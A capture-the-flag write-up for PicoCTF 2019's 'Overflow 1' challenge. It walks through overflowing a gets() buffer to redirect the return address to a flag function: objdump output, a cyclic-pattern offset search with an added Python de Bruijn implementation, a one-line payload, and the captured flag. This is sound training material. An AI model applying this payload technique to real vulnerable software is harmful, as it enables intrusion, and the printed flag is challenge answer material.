# Overflow 1 | PicoCTF2019
## Problem
You beat the first overflow challenge. Now overflow the buffer and change the return address to the flag function in this program? You can find it in /problems/overflow-1_0_48b13c56d349b367a4d45d7d1aa31780 on the shell server.

## Solution
1. Read the source to understand what is going on: the program reads input with gets() into a 64-byte buffer and then returns to an address pulled from the stack, which an overlong input can overwrite.

2. Use objdump to find the address of the flag function.
```bash
$ objdump -D vuln
...

080485e6 <flag>:
80485e6: 55 push %ebp
80485e7: 89 e5 mov %esp,%ebp
80485e9: 53 push %ebx

...

```

3. We can find the correct offset by running a cyclic pattern.
```bash
$ python -c "from pwn import cyclic; print(cyclic(80))" | ./vuln
Give me a string and lets see what happens:
Woah, were jumping to 0x61616174 !
Segmentation fault

$ python -c "from pwn import cyclic_find; print(cyclic_find(0x61616174))"
76
```
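As an added example (not part of the original writeup), here is a dependency-free reimplementation of the cyclic pattern used in step 3, so the 76 can be reproduced and the reason a de Bruijn pattern pins down the offset is visible; it assumes pwntools' default lowercase alphabet and 4-byte windows, and `offset_from_crash` is a hypothetical helper for the program's crash line.

```python
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"  # pwntools' default cyclic alphabet

def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield B(k, n) over `alphabet` one byte at a time: every n-byte window
    occurs exactly once, so the value landing in EIP pins down one offset.
    Same Lyndon-word construction as pwntools, so indices agree with it."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)

def cyclic(length, n=4):
    """First `length` bytes of the pattern (what the writeup pipes into ./vuln)."""
    return bytes(islice(de_bruijn(ALPHABET, n), length))

def cyclic_find(value, n=4):
    """Offset of `value` in the pattern, or -1.  An int read from the register
    is converted little-endian, the byte order x86 stored it in."""
    needle = value.to_bytes(n, "little") if isinstance(value, int) else value
    window = bytearray()
    for i, b in enumerate(de_bruijn(ALPHABET, n)):
        window.append(b)
        if len(window) > n:
            del window[0]
        if window == needle:
            return i - n + 1  # index where this n-byte window started
    return -1

def offset_from_crash(line):
    """Hypothetical helper: parse the challenge's "Woah, were jumping to 0x... !"
    line and return the input offset that overwrote the return address."""
    hexval = line.split("0x", 1)[1].split()[0]
    return cyclic_find(int(hexval, 16))
```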

4. Run the exploit at the right offset.
```bash
# Python 2 semantics: print writes the raw bytes of '\xe6\x85\x04\x08'
# (0x080485e6 little-endian); a Python 3 print would UTF-8 encode them.
$ python -c "print('A' * 76 + '\xe6\x85\x04\x08')" | ./vuln
Give me a string and lets see what happens:
Woah, were jumping to 0x80485e6 !
Flag File is Missing. please contact an Admin if you are running this on the shell server.
```

5. Run it on the server to win.
```bash
Woah, were jumping to 0x80485e6 !
picoCTF{n0w_w3r3_ChaNg1ng_r3tURn5a1b468a7}
```

Original writeup (https://github.com/jib1337/writeups_public/tree/master/Binary%20Exploitation/BOF_overflow1).